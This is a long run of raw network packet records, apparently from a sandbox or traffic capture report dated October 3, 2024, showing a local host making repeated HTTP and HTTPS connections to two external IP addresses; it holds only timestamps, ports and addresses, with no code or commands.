                                                        Oct 3, 2024 09:20:45.907473087 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.907511950 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.907553911 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:45.907562971 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:45.907720089 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.039633989 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.039824963 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.047147989 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.047199965 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.047317982 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.047317982 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.047343969 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.047399044 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.088020086 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.088051081 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.088206053 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.088216066 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.088371038 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.090532064 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.090981960 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.137105942 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.137475014 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.140865088 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.140913010 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.140975952 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.140989065 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.141011953 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.181323051 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.214358091 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.214593887 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.215274096 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.215358019 CEST44349710188.114.96.3192.168.2.11
                                                        Oct 3, 2024 09:20:46.215359926 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.215439081 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:46.232445002 CEST49710443192.168.2.11188.114.96.3
                                                        Oct 3, 2024 09:20:48.118127108 CEST4971180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:48.124433041 CEST804971145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:48.124531031 CEST4971180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:48.126672029 CEST4971180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:48.138039112 CEST804971145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:48.138102055 CEST4971180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:48.151190996 CEST804971145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:49.077418089 CEST804971145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:49.077564955 CEST4971180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:49.078197956 CEST804971145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:49.078330994 CEST4971180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:49.087636948 CEST804971145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:49.370779991 CEST4971280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:49.386743069 CEST804971245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:49.386850119 CEST4971280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:49.388974905 CEST4971280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:49.427066088 CEST804971245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:49.427131891 CEST4971280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:49.449954987 CEST804971245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:50.285749912 CEST804971245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:50.285872936 CEST4971280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:50.286408901 CEST804971245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:50.286459923 CEST4971280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:50.290795088 CEST804971245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:50.383428097 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:50.388549089 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:50.388747931 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:50.390712023 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:50.395893097 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:50.395967960 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:50.401247025 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:51.444361925 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:51.444637060 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:51.444808006 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:51.444818974 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:51.444891930 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:51.444891930 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:51.445071936 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:51.445137978 CEST4971380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:51.449577093 CEST804971345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:52.107420921 CEST4971480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:52.124651909 CEST804971445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:52.124741077 CEST4971480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:52.127427101 CEST4971480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:52.138016939 CEST804971445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:52.138115883 CEST4971480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:52.143893003 CEST804971445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:52.895509005 CEST804971445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:52.895647049 CEST4971480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:52.896537066 CEST804971445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:52.896604061 CEST4971480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:52.900738001 CEST804971445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:53.046730042 CEST4971580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:53.051878929 CEST804971545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:53.051964998 CEST4971580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:53.054243088 CEST4971580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:53.059556007 CEST804971545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:53.059613943 CEST4971580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:53.064809084 CEST804971545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:55.154339075 CEST804971545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:55.154455900 CEST804971545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:55.154508114 CEST4971580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:55.154545069 CEST4971580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:55.160370111 CEST804971545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:55.298652887 CEST4971780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:55.303873062 CEST804971745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:55.303949118 CEST4971780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:55.306317091 CEST4971780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:55.313158035 CEST804971745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:55.313220024 CEST4971780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:55.318362951 CEST804971745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:56.378058910 CEST804971745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:56.378201008 CEST4971780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:56.392452955 CEST804971745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:56.392535925 CEST4971780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:56.531124115 CEST4971880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:56.537033081 CEST804971845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:56.537166119 CEST4971880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:56.539355040 CEST4971880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:56.544472933 CEST804971845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:56.544536114 CEST4971880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:56.549566984 CEST804971845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:57.546360970 CEST804971845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:57.546571016 CEST4971880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:57.577390909 CEST804971845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:57.578675985 CEST4971880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:57.758976936 CEST5584380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:58.057960033 CEST805584345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:58.058073997 CEST5584380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:58.060252905 CEST5584380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:58.316111088 CEST805584345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:58.316168070 CEST5584380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:58.324692011 CEST805584345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:59.117296934 CEST805584345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:59.117485046 CEST5584380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:59.117609978 CEST805584345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:59.117671013 CEST5584380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:59.122929096 CEST805584345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:59.260401011 CEST6434880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:59.265347958 CEST806434845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:59.265481949 CEST6434880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:59.267592907 CEST6434880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:59.272653103 CEST806434845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:20:59.272737026 CEST6434880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:20:59.277841091 CEST806434845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:00.351605892 CEST806434845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:00.355678082 CEST6434880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:00.361011028 CEST806434845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:00.361129999 CEST6434880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:00.657367945 CEST6435080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:00.662729025 CEST806435045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:00.662822008 CEST6435080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:00.665224075 CEST6435080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:00.670850992 CEST806435045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:00.670902967 CEST6435080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:00.677810907 CEST806435045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:01.453564882 CEST806435045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:01.453741074 CEST806435045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:01.453897953 CEST6435080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:01.453897953 CEST6435080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:01.459279060 CEST806435045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:01.610229969 CEST6435280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:01.615058899 CEST806435245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:01.615461111 CEST6435280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:01.618191004 CEST6435280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:01.623254061 CEST806435245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:01.623466969 CEST6435280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:01.628575087 CEST806435245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:02.292433023 CEST806435245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:02.292635918 CEST6435280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:02.292690039 CEST806435245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:02.292751074 CEST6435280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:02.297468901 CEST806435245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:02.435652971 CEST6435480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:02.440912962 CEST806435445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:02.441021919 CEST6435480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:02.443226099 CEST6435480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:02.448632002 CEST806435445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:02.448704004 CEST6435480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:02.453495026 CEST806435445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:03.191437006 CEST806435445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:03.191821098 CEST806435445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:03.191951990 CEST6435480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:03.196533918 CEST6435480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:03.202516079 CEST806435445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:03.475652933 CEST6435580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:03.480690956 CEST806435545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:03.480761051 CEST6435580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:03.482903957 CEST6435580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:03.487999916 CEST806435545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:03.488048077 CEST6435580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:03.493161917 CEST806435545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:04.262743950 CEST806435545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:04.262772083 CEST806435545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:04.262865067 CEST6435580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:04.262957096 CEST6435580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:04.268373013 CEST806435545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:04.416018009 CEST6435780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:04.421169996 CEST806435745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:04.421297073 CEST6435780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:04.423429966 CEST6435780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:04.428256035 CEST806435745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:04.428361893 CEST6435780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:04.433180094 CEST806435745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:05.200607061 CEST806435745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:05.200762987 CEST6435780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:05.201138020 CEST806435745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:05.201246977 CEST6435780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:05.205631971 CEST806435745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:05.342603922 CEST6435880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:05.348911047 CEST806435845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:05.351687908 CEST6435880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:05.354207039 CEST6435880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:05.360822916 CEST806435845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:05.363792896 CEST6435880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:05.370971918 CEST806435845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:06.209109068 CEST806435845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:06.209342003 CEST6435880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:06.209383011 CEST806435845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:06.209439039 CEST6435880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:06.216903925 CEST806435845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:06.372730017 CEST6435980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:06.378586054 CEST806435945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:06.378793001 CEST6435980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:06.380893946 CEST6435980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:06.386023998 CEST806435945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:06.386274099 CEST6435980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:06.391282082 CEST806435945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:07.095535040 CEST806435945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:07.095755100 CEST6435980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:07.096066952 CEST806435945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:07.096124887 CEST6435980192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:07.101686954 CEST806435945.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:07.250000000 CEST6436080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:07.255400896 CEST806436045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:07.255842924 CEST6436080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:07.258128881 CEST6436080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:07.265115976 CEST806436045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:07.265208006 CEST6436080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:07.273240089 CEST806436045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.057806969 CEST806436045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.057863951 CEST806436045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.058000088 CEST6436080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.058067083 CEST6436080192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.062889099 CEST806436045.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.212765932 CEST6436180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.217818975 CEST806436145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.217895031 CEST6436180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.219978094 CEST6436180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.224898100 CEST806436145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.224948883 CEST6436180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.230029106 CEST806436145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.908827066 CEST806436145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.908874989 CEST806436145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:08.908970118 CEST6436180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.914026976 CEST6436180192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:08.918941021 CEST806436145.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.160537004 CEST6436280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.165386915 CEST806436245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.165496111 CEST6436280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.167659998 CEST6436280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.172564983 CEST806436245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.172629118 CEST6436280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.177422047 CEST806436245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.839379072 CEST806436245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.839438915 CEST806436245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.839582920 CEST6436280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.839634895 CEST6436280192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.844424009 CEST806436245.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.983649015 CEST6436380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.989329100 CEST806436345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.989458084 CEST6436380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.991626978 CEST6436380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:09.997446060 CEST806436345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:09.997520924 CEST6436380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:10.002466917 CEST806436345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:10.836468935 CEST806436345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:10.836563110 CEST806436345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:10.836642027 CEST6436380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:10.837057114 CEST6436380192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:10.841978073 CEST806436345.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:10.984106064 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:10.989195108 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:10.989339113 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:10.991457939 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:10.996373892 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:10.996788025 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:11.001732111 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:11.917808056 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:11.917861938 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:11.917887926 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:11.918001890 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:11.918284893 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:11.918330908 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:11.921417952 CEST6436480192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:11.926165104 CEST806436445.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:12.100244045 CEST6436580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:12.105030060 CEST806436545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:12.105155945 CEST6436580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:12.107372999 CEST6436580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:12.112209082 CEST806436545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:12.112320900 CEST6436580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:12.117145061 CEST806436545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:12.880244970 CEST806436545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:12.880259991 CEST806436545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:12.880481005 CEST6436580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:12.880548000 CEST6436580192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:12.885827065 CEST806436545.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.035780907 CEST6436680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.044430971 CEST806436645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.044519901 CEST6436680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.046875954 CEST6436680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.055427074 CEST806436645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.055507898 CEST6436680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.064030886 CEST806436645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.766148090 CEST806436645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.766297102 CEST806436645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.766336918 CEST6436680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.766391993 CEST6436680192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.771289110 CEST806436645.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.903770924 CEST6436780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.908863068 CEST806436745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.908951998 CEST6436780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.911133051 CEST6436780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.916779041 CEST806436745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:13.916853905 CEST6436780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:13.921673059 CEST806436745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:14.575090885 CEST806436745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:14.575146914 CEST806436745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:14.575323105 CEST6436780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:14.601238966 CEST6436780192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:14.606298923 CEST806436745.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:14.869189978 CEST6436880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:14.874142885 CEST806436845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:14.874232054 CEST6436880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:14.876427889 CEST6436880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:14.881191015 CEST806436845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:14.881237984 CEST6436880192.168.2.1145.149.241.169
                                                        Oct 3, 2024 09:21:14.886039019 CEST806436845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:15.898722887 CEST806436845.149.241.169192.168.2.11
                                                        Oct 3, 2024 09:21:15.899147034 CEST6436880192.168.2.1145.149.241.169
